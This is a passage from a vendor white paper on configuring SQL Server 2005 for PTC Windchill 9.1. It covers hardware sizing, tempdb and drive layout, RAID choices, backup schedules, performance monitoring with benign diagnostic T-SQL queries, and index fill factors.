activities, Windchill ProjectLink helps customers better manage all of their programs, project schedules, information, and processes. As an integral component of PTC’s Product Development System (PDS), Windchill manages all product content and business processes throughout a product’s lifecycle. Windchill connects seamlessly to Pro/ENGINEER for three-dimensional (3-D) computer-aided design (CAD) models, ProductView® for advanced mock-up and interactive visualization, Mathcad® for engineering calculations, and Arbortext® for dynamic publishing. SQL Server: An Enterprise-Ready Database Platform for Windchill Microsoft SQL Server provides an ideal database platform for Windchill. SQL Server is a high-performance, integrated database and business intelligence (BI) solution for data management and analysis. This easy-to-implement, easy-to-support foundation provides a multifunctional solution for large-scale online transaction processing (OLTP), data warehousing, and e-commerce applications and a solution for data integration, analysis, and reporting. SQL Server can help companies manage large volumes of mission-critical data and run software applications—such as PTC Windchill—to optimize their business performance. SQL Server can extract and transform data from a variety of sources, including XML data files, flat files, and relational data sources, and then load it into one or more destinations. In addition to rapid data mining, analysis, processing, and reporting capabilities, SQL Server has built-in features that give you a secure, reliable, and productive data management environment that truly protects your data. With its scalable infrastructure, SQL Server has the capability to grow with your business and keep up with your toughest data challenges. PTC and Microsoft: A History of Innovation PTC and Microsoft deliver complementary product development solutions that organizations can use broadly across their infrastructure. With a Microsoft IT infrastructure, you get an open, extensible platform and a simplified user experience. You can take advantage of your existing IT investments for a lower total cost of ownership (TCO). PTC provides full integration with your Microsoft infrastructure, including Microsoft® Office SharePoint® Server, Microsoft® Office Project Server, Microsoft® Office Communications Server, Windows Server®, and SQL Server. The PDS architecture gives you end-to-end solutions for product development and a single source for product and process knowledge. Together, PTC and Microsoft deliver powerful product development solutions that provide tremendous customer value. Better Together: Windchill on the SQL Server Database Platform Running Windchill on SQL Server delivers measurable value by channeling data into manageable, automated processes. This decreases administrative time, improves productivity, reduces costs, and generates greater employee satisfaction. Benchmarking tests confirm that SQL Server scales to meet the performance needs of even the largest enterprise customers, while providing lower initial costs and licensing fees.¹ Benchmark test results showed that Pro/ENGINEER and Windchill 9.1 performed up to 50 percent faster on SQL Server 2005 than on a competitor’s database, with an average performance advantage of approximately 10 percent. These results confirm SQL Server 2005 as a superior database choice for Windchill 9.1. Best Practices for Installing Windchill on SQL Server Best practices define the most efficient use of computing resources to produce the best system performance and most reliable delivery and availability of data. Because many factors can contribute to poor system performance, you should aim to implement best practices in both planning and operating your Windchill system. The Windchill application database needs periodic maintenance and tuning. Without such maintenance, database operations can become considerably slower over time. Implementing best practices helps ensure that your SQL Server database is: - Configured for administrative monitoring - Free of database corruption and system errors - Available when users need it - Tuned for optimal performance, letting users receive the data they request in a reasonable period - Able to return to normal operation quickly after a failure Best practices for Windchill on the SQL Server database platform encompass both hardware and software. They include sizing, setting up, validating, maintaining, monitoring, and backing up your system. The guidance provided in this paper can get you started on items not covered in the following PTC documents: “Windchill on Microsoft SQL Server Installation Planning Guide®: Enterprise Deployment Resource, Windchill® 9.0 & Windchill® 9.1” and “Windchill® and Pro/INTRALINK® 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform.” PTC and Microsoft provide a great deal of valuable guidance for keeping your Windchill management system running smoothly. For more detailed information, see the Links for Further Information at the end of the paper. Trouble-free performance is impossible to guarantee. However, if you find that you need to make a service call, ensure that you have first run through the recommended monitoring guidance in the sections that follow. These best practices will provide you with valuable information that you can use to get your system back up and running quickly. Select, Size, and Configure SQL Server for Optimal Performance PTC requires SQL Server 2005 Standard or Enterprise Edition for Windchill 9.1. In most cases², the recommended configuration is SQL Server 2005 Service Pack 3 (SP3) running on x64 hardware. Larger sites may require Windows 2008 R2 Data Center Edition with SQL Server 2005 Enterprise Edition to support more than eight (8) x64 sockets. The SQL Server 2005 Features Comparison page provides more information, and SQL Server Books Online’s Editions and Components of SQL Server 2005 gives you additional guidance on choosing appropriate SQL Server editions and features for your implementation. ² Running AWE with SQL Server 2005 x86 on an x64 system is not recommended. SQL Server will consume all of the memory except 128MB, which can impact performance. AWE can use only 16GB of memory. This document walks you through the key steps in setting up SQL Server 2005 for Windchill 9.1. Note: Windchill 10.0 will run on SQL Server 2008; Windchill 9.1 requires SQL Server 2005. Hardware Selection The sizing tables in the Appendix augment the guidance in “Windchill® and Pro/INTRALINK® 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform” by showing the suggested initial number of cores, sockets, and operating system (OS) options for running Windchill on SQL Server. Except for the smallest installations (four CPUs or fewer), you will need to run SQL Server Enterprise Edition using x64 CPUs. This paper focuses on this type of configuration. If you are purchasing hardware, you may want to ensure that the hardware will support more cores and more memory then stated in the sizing table. It is considerably more expensive and difficult to replace the hardware later. Many firms deem additional memory and CPUs for existing hardware to be expenses while replacement machines may be capital investments. CPUs Look for CPUs and disk drives with larger caches. Look for CPUs with at least 16MB L3 Cache. For disk drives, require at least a 16MB read buffer. Avoid IA64 CPUs because Microsoft is discontinuing support for them. Do not view a hyper-threading core as two cores. Intel’s paper “How to Determine the Effectiveness of Hyper-Threading Technology with an Application” indicates that the actual gain from hyper-threading is only 15%-30% more than a single core. Memory The system memory should be the fastest available (DDR3-1600 or better). The motherboard, memory, and CPUs must be compatible. Physical Hard Drives Obtain the best performing drives that you can afford. Performance is typically a function of rotations per minute (RPM) and cache size, but interface cards and drivers are involved. The performance of a RAID array is often more dependent on the RAID card than on the hard drives. If not all of the drives are identical, evaluate each hard drive’s performance using SQLIO before allocating them to logical drives. (For details, see the comprehensive companion white paper “Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server,” available on the Microsoft and PTC Alliance Web page.) Before evaluating drive performance, reformat all of the hard drives used for data storage. If you are using Windows Server 2003, make sure you align disk partitions. automatically does disk alignment, 2003 does not. Incorrect alignment can cut performance by up to 30%. If you have physical drives with different performance characteristics, you should assign them to different components as suggested in Table 1. Table 1 - Assigning Components by Disk Performance <table> <thead> <tr> <th>Random I/O Drive Performance</th> <th>Use for</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>Best</td> <td>Tempdb</td> <td>This is where most performance-critical activities occur.</td> </tr> <tr> <td>Medium</td> <td>Random access</td> <td>This type of activity requires frequent movement across the disk.</td> </tr> <tr> <td></td> <td>tables</td> <td></td> </tr> <tr> <td>Worst</td> <td>Log files, log</td> <td>This type of component serializes writes to the disk into a</td> </tr> <tr> <td></td> <td>tables</td> <td>continuous stream. The serial write performance should not be less</td> </tr> <tr> <td></td> <td></td> <td>than the random write performance of the database being logged.</td> </tr> </tbody> </table> A Storage Area Network (SAN) is often the preferred storage medium because it is the easiest scale-out solution. A SAN Logical Unit Number (LUN) is equivalent to a RAID unit and behaves like a logical drive. SAN units should be on isolated networks supporting at least 1GB transfer speeds. Here are PTC’s recommendations for hard drives: - Do not use software to emulate RAID; always use hardware. - Do not use SATA drives; use SCSI drives. - Use RAID 1+0 when possible; otherwise, use RAID 1, RAID 5, or RAID 6. - Use more small drives instead of fewer large drives. Two small 7200 RPM drives striped may deliver better performance than one 15000-RPM drive and at substantially less cost. In addition to the “Best Drive Configuration Practices” paper, see Storage Top 10 Best Practices and Mike Ruthruff’s Predeployment I/O Best Practices for more details. Configuring Tempdb The SQL Server tempdb system database provides temporary storage space for many things from temporary tables to DBCC CHECKDB worktables. Tempdb configuration greatly influences Windchill performance. SQL Server will use tempdb for various activities if there is insufficient memory on your system, and this shifting of activity to tempdb results in a significant loss of performance. A poorly configured tempdb compounds the performance loss. For all disk drives, PTC recommends the following: - The drives should be RAID (1 or 1+0, but not RAID 5). - If one of the drives should fail, SQL Server will shut down with RAID 1. - The drives should be the fastest (typically 15000 RPMs) and provide the highest throughput that you can afford. - Drives should have write caching turned off. - Verify that the disks’ partitions are aligned properly. - The Windows swap file should not be located on any of the above drives, nor on the OS drive. - Do not change the Windchill database owner from system administrator (sa). - Create alerts using SQL Server Agent to track for errors 1101 or 1105, which indicate that you are running out of space on at least one drive. - Error 1101: Could not allocate a new page for database because of insufficient disk space in filegroup. - Error 1105: Could not allocate space for object. For tempdb configuration, PTC recommends the following: - Tempdb should not be located on: - The OS drive - Any drive that also contains the database files - Tempdb should be located on at least one dedicated logical drive. - Tempdb should be striped across as many drives as practical. - Locate the tempdb log on a dedicated logical drive. There is rarely benefit to spreading the transaction log across multiple drives. - Create one tempdb data file per core for the tempdb filegroup. - All of the files in the tempdb filegroup should be the same size. - Use striped drives to increase throughput. - If distributing the files across different physical drives, the drive speeds should be the same. - See Table B in the Appendix for more details. - Use Table B in the Appendix to determine the number of tempdb files that should be in each filegroup. - Enable autogrowth and set it to 10% to protect system performance if your environment does not conform to the capacity tables. - Once you have populated the database with the expected volume of data, monitor tempdb while rebuilding the indexes of the table that has the most rows. - Tempdb should always be on drives with available space being at least 20% of the database size. A larger tempdb may be required depending on the ad hoc queries that --- 7 [http://support.microsoft.com/kb/234656](http://support.microsoft.com/kb/234656) are executed against the database. A bad query might result in significant growth. Adding an additional large index may result in index rebuilds failing due to a lack of space in tempdb. Running out of space in tempdb may stop Windchill and reduce SQL Server to limited functions. - Caution: Turning on Snapshot Isolation to match Oracle’s default transaction behavior requires appropriate sizing adjustments to tempdb. It may significantly increase the demands on tempdb and, with the wrong hardware configuration, decrease performance. - If you are using a SAN, tempdb should have its own dedicated drives and its own LUN. *Error! Reference source not found.* shows a sample 4-core tempdb configuration following these best practices. **Figure 1 - Example of a 4-core Tempdb Configuration** Table 2 shows the database options available for tempdb and PTC’s recommended values for them to ensure the best performance with Windchill. **Table 2 - Recommended Values for Tempdb Database Options** <table> <thead> <tr> <th>Database Option</th> <th>Default Value</th> <th>Recommended Value</th> </tr> </thead> <tbody> <tr> <td>AUTO_CREATE_STATISTICS</td> <td>ON</td> <td>ON</td> </tr> <tr> <td>AUTO_UPDATE_STATISTICS</td> <td>ON</td> <td>ON</td> </tr> <tr> <td>AUTO_UPDATE_STATISTICS_ASYNC</td> <td>OFF</td> <td>ON</td> </tr> <tr> <td>CHANGE_TRACKING</td> <td>OFF</td> <td>OFF</td> </tr> </tbody> </table> Make sure you also follow these recommendations for additional SQL Server options affecting tempdb: - SORT_IN_TEMPDB should be ON. - CHECKSUM should be ON. SQL Server drops tempdb and recreates it every time SQL Server stops and is restarted. It is important to note the size of tempdb before stopping the server and then use ALTER DATABASE to set the initial size of tempdb to this size if it is greater than the current setting. Doing this reduces the number of times that autogrowth occurs, improving performance and reducing disk fragmentation. PTC also recommends instant file initialization of tempdb, which we will cover in a moment. In addition, as part of regular weekly maintenance, you should: - Check the SQL Server error log for the following error numbers: 1101, 1105, 3959, 3958, and 3966. Alternatively, set up a SQL Server Agent alert to email a notification when these errors occur. If you see any of these errors, you should troubleshoot for a sizing issue.² - Check the size of tempdb versus its startup setting. Increase the startup setting if it is less than the size observed. - Record the maximum size of tempdb you see for periodic review. **Instant File Initialization** The default behavior for tempdb is to recreate itself when SQL Server starts with a small database size and grow as needed. During this growth process, SQL Server initializes the file by filling the space with zeros. Specifying a larger initial file size and doing instant file initialization will improve performance. The initial size should be at least the largest size seen in production. See the SQL Server Premier Field Engineer blog post “How and Why to Enable Instant File Initialization” for more information. **Using Tempdb in Memory** SQL Server versions prior to 2005 allowed tempdb to be explicitly placed in memory for better performance. SQL Server 2005 requires the creation of a RAM disk to place tempdb in memory (see Microsoft SQL Server I/O subsystem requirements for the tempdb database). The other option to obtain equivalent performance is to use a DRAM-based solid-state drive. Putting tempdb on a RAM drive should never be an initial configuration. When your application is fully populated and in regular production, verify the condition below to determine if there is adequate RAM: \[ \text{Total Physical Memory} - (1.2 \times \text{Maximum tempdb Size Observed}) > (1.2 \times \text{Maximum Memory Used}) \] --- This formula includes a 20% buffer to allow for future growth. If you do not have sufficient physical memory to fulfill the above condition, you may have lower throughput if you place tempdb in memory. For more information about drive configurations, see the “Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server” and “TEMPDB Capacity Planning and Concurrency Considerations for Index Create and Rebuild.” Memory and CPU The sizing guidance provided in “Windchill and Pro/INTRALINK 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform” may not apply to your installation because of a difference in usage pattern. You can confirm whether your configuration for memory and CPU is adequate by using Windows Performance Monitor. To get the information you need, configure and run Performance Monitor as follows: - Set the polling frequency to 30 seconds or more. - Do not run it on the machine hosting SQL Server. - Log the data to a physical file. - Consider running it as a service or at a scheduled time for consistent data collection. - The monitoring period should be the weekly peak load; typically, this occurs on Thursday afternoons. - Retain a 24-hour baseline of the busiest day to use for future reference. After every major software patch or hardware change, rerun Performance Monitor and compare the results to determine the positive or negative impact that the change made. During peak load periods run Performance Monitor and review the items shown in ### Table 3 - Performance Monitor Indicators of Inadequate Resources <table> <thead> <tr> <th>Object</th> <th>Counter</th> <th>Description</th> <th>Recommended Action</th> </tr> </thead> <tbody> <tr> <td>Logical Disk</td> <td>% Free Space</td> <td>&lt; 15%: More disk space needed</td> <td></td> </tr> <tr> <td></td> <td>Avg. Disk sec/Read</td> <td>Applies to each logical drive</td> <td>&gt; 15: I/O/disk bottleneck</td> </tr> <tr> <td>Memory</td> <td>Cache Bytes</td> <td>&gt; 300MB: Disk bottleneck, better controllers, faster disks</td> <td></td> </tr> <tr> <td></td> <td>% Committed Bytes in Use</td> <td>&gt; 80%: Add more memory</td> <td></td> </tr> <tr> <td></td> <td>Available Mbytes</td> <td>&lt; 5% of total RAM: Add more memory</td> <td></td> </tr> <tr> <td>Network Interface</td> <td>Output Queue Length</td> <td>&gt; 2: Faster network card or segment the network</td> <td></td> </tr> <tr> <td>SQL Server: Buffer Manager</td> <td>Buffer-Cache Hit Ratio</td> <td>Ratio of reads found cached in memory</td> <td>&lt; 95%: Add more memory</td> </tr> <tr> <td></td> <td>Page Life Expectance</td> <td>Ratio of reads found cached in memory</td> <td>&lt; 300 or sudden drops: Add more memory</td> </tr> <tr> <td>SQL Server: General Statistics</td> <td>User Connections</td> <td>If 255 (system default) or current default, you need to increase setting</td> <td></td> </tr> <tr> <td>SQL Server: SQL Statistics</td> <td>Batch Request/Sec</td> <td>If 0.9 &gt; (Batch Request – SQL Compilation) / Batch Requests: CPU bottleneck</td> <td></td> </tr> <tr> <td></td> <td>SQL Compilation/Sec</td> <td>&lt; 90%: CPU bottleneck</td> <td></td> </tr> </tbody> </table> --- Additional Performance Analysis with DMVs In addition to Performance Monitor, you can use SQL Server’s dynamic management views (DMVs) to analyze your system’s performance. SQL Server tracks wait information into DMVs, and you can execute the following queries against them to detect additional problems:\(^\text{17}\) - To detect a CPU bottleneck: o select wait_type from sys.dm_os_wait_stats where wait_time_ms > 0 and signal_wait_time_ms/wait_time_ms > .25 - To see if CPU throughput is being lost to parallelism: o select wait_type from sys.dm_os_wait_stats where wait_type='cxpacket' And wait_time_ms > 0 and signal_wait_time_ms/wait_time_ms > .10 - To investigate a possible blocking bottleneck: o select *,wait_time_ms/(waiting_tasks_count+1) as Avg from sys.dm_os_wait_stats where wait_type like 'LCK_%' and waiting_tasks_count > 0 and max_wait_time_ms > 2 * wait_time_ms/(waiting_tasks_count+1) - To detect an I/O bottleneck: o select * from (select Top 20 * from sys.dm_os_wait_stats order by max_wait_time_ms Desc) TopItems Where wait_type in ('ASYNCH_IO_COMPLETION', 'IO_COMPLETION', 'LOGMGR', 'WRITELOG') or wait_type like 'PAGEIOLATCH_%' o (Also see Error! Reference source not found. for an example of a possible problem with the log file; a 0.39 second delay was seen for writing to the log, which could slow the entire database.) Execute these queries at the end of the business day so that you let the data accumulate beginning from when SQL Server was started. When you want to observe the statistics for a specific period, you can reset the counters using the following command: ``` DBCC SQLPERF ('sys.dm_os_wait_stats', CLEAR); ``` Figure 2 - Example of Possible I/O Bottleneck on the Log File <table> <thead> <tr> <th>wait_type</th> <th>waiting_tasks_count</th> <th>wait_time_ms</th> <th>max_wait_time_ms</th> <th>signal_wait_time_ms</th> </tr> </thead> <tbody> <tr> <td>WRITELOG</td> <td>2853</td> <td>6281</td> <td>390</td> <td>125</td> </tr> <tr> <td>PAGIOIOLATCH_SH</td> <td>638</td> <td>1375</td> <td>140</td> <td>15</td> </tr> <tr> <td>IO_COMPLETION</td> <td>874</td> <td>1171</td> <td>140</td> <td>15</td> </tr> <tr> <td>PAGIOIOLATCH_EX</td> <td>361</td> <td>359</td> <td>46</td> <td>0</td> </tr> <tr> <td>PAGIOIOLATCH_UP</td> <td>32</td> <td>15</td> <td>15</td> <td>0</td> </tr> </tbody> </table> Locked Pages Starting with SQL Server 2005 SP3, Standard Edition supports Locked Pages in memory, which gives similar advantages to running SQL Server 2005 x86 with AWE. This option may improve performance if you have adequate memory. For instructions on enabling this option, see the article “Support for Locked Pages on SQL Server 2005 Standard Edition 64-bit systems and on SQL Server 2008 Standard Edition 64-bit systems.” Lock Escalation Lock escalation rarely occurs with Windchill, but it may occur with some usage patterns. If you observe blocking conditions, start a SQL Server Profiler trace that includes the Lock:Escalation event. If you see this event, read this support article about how to resolve the problem. Database Files Running PTC on SQL Server provides a firm foundation for your mission-critical PLM activities. PTC Windchill supports essential product engineers who cannot do their work if SQL Server is not available. Thus, it is critical that contingency planning be at the forefront of your installation planning. At a minimum, it is strongly recommended that hard drives containing database files be redundant (mirrored or parity) on hot-swappable drives. If one drive fails, there is no loss of data, nor is there a need to bring SQL Server down to replace the drive. Hardware failures happen, and there are two common paths for recovery: - **Via an RAID array with hot pluggable drives:** The database will not be offline. 1. Replace the failed drives promptly. 2. Rebuild the failed drive dynamically from the other drives. - **Via the Full recovery model:** If drives are not mirrored or parity-swappable, you must use the SQL Server Full recovery model. The database will be offline until recovered, which may be hours or days depending on the size of the database and the number of backups you need to restore. 1. Replace the failed drive. 2. Restore the last full database backup. 3. Restore the subsequent differential database backups in sequence. 4. Restore the transaction log backups in sequence since the last differential database backup. 5. Restore the current transaction log. --- **RAID Drive Arrays** There are two important concepts involved with RAID drives: - **Performance**—done via striping - **Redundancy**—done by mirroring or parity Table 4 contains a summary of common RAID types and their features. (See “Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server” for further information.) <table> <thead> <tr> <th>Raid Type</th> <th>Features</th> <th>Drive Ratio</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>Striped</td> <td>1:1</td> <td>Faster speed, no backup</td> </tr> <tr> <td>1</td> <td>Mirror</td> <td>1:2+</td> <td>Redundant drives, data not lost if a drive fails</td> </tr> <tr> <td>3 and 4</td> <td>Striped Parity</td> <td>1:3+</td> <td>Poor performance, redundant drives, better storage efficiency than RAID 1</td> </tr> <tr> <td>5</td> <td>Striped Parity</td> <td>1:3+</td> <td>Can tolerate the loss of 1 drive</td> </tr> <tr> <td>6</td> <td>Striped Dual Parity</td> <td>1:4+</td> <td>Can tolerate the loss of 2 drives</td> </tr> <tr> <td>10 or 1+0</td> <td>Mirror Striped</td> <td>1:4+</td> <td>First mirrored, then striped</td> </tr> <tr> <td>01 or 0+1</td> <td>Striped Mirror</td> <td>1:4</td> <td>Same as above except the sequence is reversed</td> </tr> </tbody> </table> **Note:** A logical drive (M:) that is RAID 1+0 will consist of at least four (4) physical drives. For most of this document, a drive means a logical drive. Be alert for multiple logical drives partitioned from one physical drive—it may result in loss of both performance and redundancy. **SAN Drives** If you are using SAN drives for your database files, some special settings affect performance. In particular, the Host Bus Adapter default is too low a value; use the recommendation shown in Table 5. SQLIO provides guidance on the optimal settings for your hardware. For more information, see Mike Ruthruff’s SQL Server Predeployment I/O Best Practices article. <table> <thead> <tr> <th>Database Option</th> <th>Default Value</th> <th>Recommended Value</th> </tr> </thead> <tbody> <tr> <td>Host Bus Adapter (HBA) Queue Depth</td> <td>8-32</td> <td>64 (Varies by hardware(^{19}))</td> </tr> </tbody> </table> Recovery Model PTC recommends using the SQL Server Full recovery model for Windchill because the cost of losing data is significant, both in terms of recreating the data and in terms of identifying what was lost. This model requires regular transaction log backups, as follows: - **Transaction logs and backups should never be on a hard disk that contains any Windchill database file—if this drive goes bad, it is impossible to recover.** - If the transaction logs drive fails (and is not mirrored), then you must immediately: - Stop SQL Server - Do a full backup - Replace the drive - Start SQL Server - You should schedule automatic backups as shown in Error! Reference source not found. <table> <thead> <tr> <th>Action</th> <th>Small Installation</th> <th>Medium Installation</th> <th>Large Installation</th> </tr> </thead> <tbody> <tr> <td>Full Backup</td> <td>Weekly</td> <td>Daily</td> <td>Daily</td> </tr> <tr> <td>Differential Backup</td> <td>Daily</td> <td>Every 4 working hours</td> <td>Every hour</td> </tr> <tr> <td>Transaction Log Backup</td> <td>Every 4 working hours</td> <td>Every hour</td> <td>Every 15 minutes</td> </tr> </tbody> </table> Other recovery models are not appropriate for a variety reasons; for example, neither the Bulk-logged recovery model nor the Simple recovery model fully logs binary large object (BLOB) operations. **Cost of Recovering Instead of Using Hot-Swapped Mirror Drives** The Windchill database can be very large, and a full recovery from backups and transaction logs may take many hours or days. The economic cost of lost productivity can become significant. You should view database recovery as a secondary insurance policy, with the primary insurance provided by redundant hot-swappable drives. **Disk Drive Subsystems** Table 7 shows the expected performance from a variety of disk drive options. The better performance typically comes with higher hardware costs and higher skill levels to correctly configure and maintain the system. Table 7 - Ranked Performance of Different Disk Drive Subsystems <table> <thead> <tr> <th>File Type</th> <th>DRAM SSD</th> <th>SAN</th> <th>RAID 0</th> <th>RAID 1+0</th> <th>Raid 5</th> </tr> </thead> <tbody> <tr> <td>Tempdb</td> <td>1</td> <td>2</td> <td>3</td> <td>4</td> <td>No</td> </tr> <tr> <td>Tempdb Log</td> <td>1</td> <td>2</td> <td>3</td> <td>4</td> <td>No</td> </tr> <tr> <td>Transaction Log</td> <td>No</td> <td>1</td> <td>No</td> <td>2</td> <td>3</td> </tr> <tr> <td>Database</td> <td>No</td> <td>1</td> <td>No</td> <td>2</td> <td>3</td> </tr> </tbody> </table> Here is a reminder of PTC’s recommendations for drives containing data files: - The logical drives should be RAID 1, RAID 1+0, or RAID 5. - Use SCSI hard drives and not SATA physical drives. - Use smaller physical drives instead of bigger drives. - RAID should be hardware based and not software based. - The physical drives should be the fastest drives and highest throughput that you can afford. Remember to test the throughput in situ. - Data files should not be located on the drive where the OS resides. - The Windows swap file should not be located on any of these drives, nor on the OS drive. - The transaction log files should be on a different logical drive or LUN than any database files. - When using multiple disks in a filegroup, make sure that all of the files are the same size and the physical drive speeds are the same. - Verify that the disk partitions are aligned properly. Windchill Logical Files The default installation of Windchill creates five (5) logical files, as Table 8 shows. PTC’s SQL Server Configuration Utility (SCU) determines the initial size of the database files. SCU allows you to create either a medium-size or large database. Each logical database file is assigned to a separate filegroup, as follows: - WcAdmin → PRIMARY filegroup - WcAdmin_blobs → BLOBS filegroup - WcAdmin_index → INDX filegroup - WcAdmin_wcaudit → WCAUDIT filegroup In addition, you have the Windchill transaction log (WcAdmin_log) file. For best performance, at least eight (8) logical drives should be available. These logical drives should be independent—that is, not co-located on the same physical drive. --- 20 Mirroring is required for high availability systems so that a single physical drive failure does not stop SQL Server. ### Table 8 - Windchill Logical Files <table> <thead> <tr> <th>Logical Name</th> <th>Initial Size</th> <th>Activity Type</th> <th>Volume</th> <th>Primary Activity</th> </tr> </thead> <tbody> <tr> <td>WcAdmin</td> <td>1GB</td> <td>Random</td> <td>High</td> <td>R/W</td> </tr> <tr> <td>WcAdmin_blobs</td> <td>1GB</td> <td>Random</td> <td>Low</td> <td>R/low W</td> </tr> <tr> <td>WcAdmin_index</td> <td>1GB</td> <td>Random</td> <td>Medium</td> <td>R/W</td> </tr> <tr> <td>WcAdmin_wcaudit</td> <td>240MB</td> <td>Sequential</td> <td>Low</td> <td>W</td> </tr> <tr> <td>WcAdmin_log</td> <td>1GB</td> <td>Sequential</td> <td>Low</td> <td>W</td> </tr> </tbody> </table> Using a tool such as Microsoft’s [SQLIO](https://www.microsoft.com), evaluate each logical drive to determine the actual performance for sequential and random access. The allocation of drives should follow this heuristic pattern: - Because transactions cannot happen faster than they can be logged, the lowest-latency highest sequential-write drive(s) should be assigned to `tempdb log`, with preference being given to the highest throughput metrics. - The lowest latency remaining drive(s) for random read and write should be assigned to `tempdb`, with preference being given to the highest throughput metrics. - The lowest latency remaining sequential write drive(s) should be assigned to the transaction log (WcAdmin_log), with preference being given to the highest throughput metrics. - The lowest latency remaining drive for sequential write should be assigned to Wc_audit, with preference being given to the highest throughput metrics; audit trails are similar to logs in behavior. - The lowest latency remaining drive(s) for random read and write should be assigned to WcAdmin_index, with preference being given to the highest throughput metrics. - The lowest latency remaining drive(s) for random read and write should be assigned to WcAdmin, with preference being given to the highest throughput metrics. - The remaining drive(s) should be assigned to WcAdmin_blobs, with preference being given to the highest throughput metrics. - Backups should be assigned to whatever is left over (or to network locations). After installing Windchill on SQL Server, you should adjust the autogrowth properties to reflect your environment. PTC recommends using the largest of the following: - 10%, as shown in Error! Reference source not found. - Determine the size of the largest document in MB that you expect to store, and multiply that value by 100. Increase WcAdmin_blobs autogrowth to either this value (in MB) or to the percentage of the initial size that equals this value. (Never decrease the autogrowth factor.) - When Windchill is in operation, record the weekly size of each database file and then set autogrowth to twice the average weekly increase. This strategy results in autogrowth happening only twice a month. This may be done by executing the following query: ```sql SELECT Name, (Size * 8)/1024 as MB FROM sys.database_files ``` The “Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server” paper provides detailed analysis for configuring logical drives. Table 9 shows a recommended logical drives configuration. Table 9 - Example of Logical Drive Assignments <table> <thead> <tr> <th>Drive #</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Tempdb (database)</td> </tr> <tr> <td>2</td> <td>Tempdb Log (database log)</td> </tr> <tr> <td>3</td> <td>wcAdmin Log (database log)</td> </tr> <tr> <td>4</td> <td>INDX (filegroup)</td> </tr> <tr> <td>5</td> <td>PRIMARY (filegroup)</td> </tr> <tr> <td>6</td> <td>BLOBS (filegroup)</td> </tr> <tr> <td>7</td> <td>WCAUDIT (filegroup)</td> </tr> <tr> <td>8</td> <td>Backups (operating system)</td> </tr> </tbody> </table> **Index Tuning** Tuning and maintenance of indexes can often result in dramatic performance improvements. Indexes fragment from constant inserts, updates, and deletes. Thus, PTC recommends: - Scheduling weekly rebuilds of all indexes. - With SQL Server Enterprise Edition, you can rebuild online. - Only rebuild immediately before a full database backup and after the last transaction log backup. This will reduce the size of your backups. **What Is a Fill Factor?** A fill factor is the space left in an index record for adding new entries. When a record lacks space, it splits into two, creating two new records that are each 50% filled. This process continues indefinitely. The locations of the new records are not in sequence (as the original index would be), so the disk drive may have to skip back and forth to find the new split record located somewhere else on the drive and then return to the old location to read the next record. This random (instead of the ideal sequential) reading of the index can slow performance considerably. If you look at a contemporary 15000-RPM SCSI drive specification, you will see 0.3 milliseconds for a single track seek, 4.5 milliseconds for average seek time, and 11 milliseconds for maximum seek time. If 5% of the index records are split records, the time to read the index will double and performance will drop by 50%. In general, with a new database, a low fill factor (50%) is best because of the high percentage of new records that will occur each day. As the database populates, you should reduce the fill factor because the percentage of new records will reduce dramatically. Error! Reference source not found. shows how the percentage of growth decreases over time with the same number of records added weekly. Figure 4 - Rate of Growth Over Time with Constant Rate of New Records If you keep track of the percentage growth of each table between every regular rebuild, you can use Microsoft Excel to compute fill factors on a table-by-table basis, as Table 10 shows. This computed fill factor should result in less than 2% of index records splitting in a week. Table 10 - Calculating Fill Factor from Historical Data <table> <thead> <tr> <th>Week</th> <th>Growth</th> <th>Formula</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>5.7</td> <td></td> </tr> <tr> <td>2</td> <td>6.3</td> <td></td> </tr> <tr> <td>3</td> <td>4.5</td> <td></td> </tr> <tr> <td>4</td> <td>5.9</td> <td></td> </tr> <tr> <td>5</td> <td>5.4</td> <td></td> </tr> <tr> <td>6</td> <td>4.8</td> <td></td> </tr> <tr> <td>7</td> <td>6.8</td> <td></td> </tr> <tr> <td>Average</td> <td>5.628571</td> <td>=Average( )</td> </tr> <tr> <td>Std Dev</td> <td>0.807701</td> <td>=StdDev( )</td> </tr> <tr> <td>Fill Factor</td> <td>91.94833</td> <td>=100-Average() – 4 * StdDev( )</td> </tr> </tbody> </table> Evaluating Index Fragmentation To obtain information about problem indexes in wcAdmin, you can use this T-SQL code: ``` SELECT Object_Name(object_id), index_type_desc, avg_fragmentation_in_percent, avg_fragment_size_in_pages FROM sys.dm_db_index_physical_stats (DB_ID('wcAdmin'), NULL, NULL, NULL, NULL) WHERE avg_fragmentation_in_percent > 0 AND avg_fragment_size_in_pages > 1 AND index_type_desc<>'HEAP' ORDER BY avg_fragmentation_in_percent desc ``` An example of this query’s output is shown in Figure 5. Performance starts deteriorating at 5%\(^{21}\), and performance degradation can become very significant at 20%. The numbers reported for the heap index type are meaningless and should be ignored. With weekly rebuilds and a weekly growth rate of around 2%, using a fill factor from Error! Reference source not found. will allow appropriate growth with little fragmentation before the next rebuild. If the period between rebuilds is longer, then the fill factor should be lower to allow more growth without fragmentation. Always do a rebuild in the period \textit{between} the last transaction log backup and a full database backup to avoid backing up the log created from rebuilding the index (which can become very large). **Table 11 - Fill Factors by Index Key Size for 2% Growth** <table> <thead> <tr> <th>Index Key Size</th> <th>Fill Factor</th> </tr> </thead> <tbody> <tr> <td>474</td> <td>88%</td> </tr> <tr> <td>447</td> <td>89%</td> </tr> <tr> <td>251</td> <td>91%</td> </tr> <tr> <td>161</td> <td>92%</td> </tr> <tr> <td>149</td> <td>93%</td> </tr> <tr> <td>103</td> <td>94%</td> </tr> <tr> <td>88</td> <td>95%</td> </tr> <tr> <td>44</td> <td>96%</td> </tr> </tbody> </table> If there is not a significant drop in fragmentation, some possible causes might be: - The index is less than 1000 pages - Lack of contiguous pages **Types of Indexes** SQL Server provides several types of indexes. - **Heap**: A heap occurs on a table *without* a clustered index. Records are located via a triplet \{FileId:PageNum:SlotNum\}, with records written randomly. You will rarely see a heap index in commercial systems. - **Clustered index**: With a clustered index, the records are ordered physically on disk by the index, giving the table an explicit order. - The next record is often physically located next to 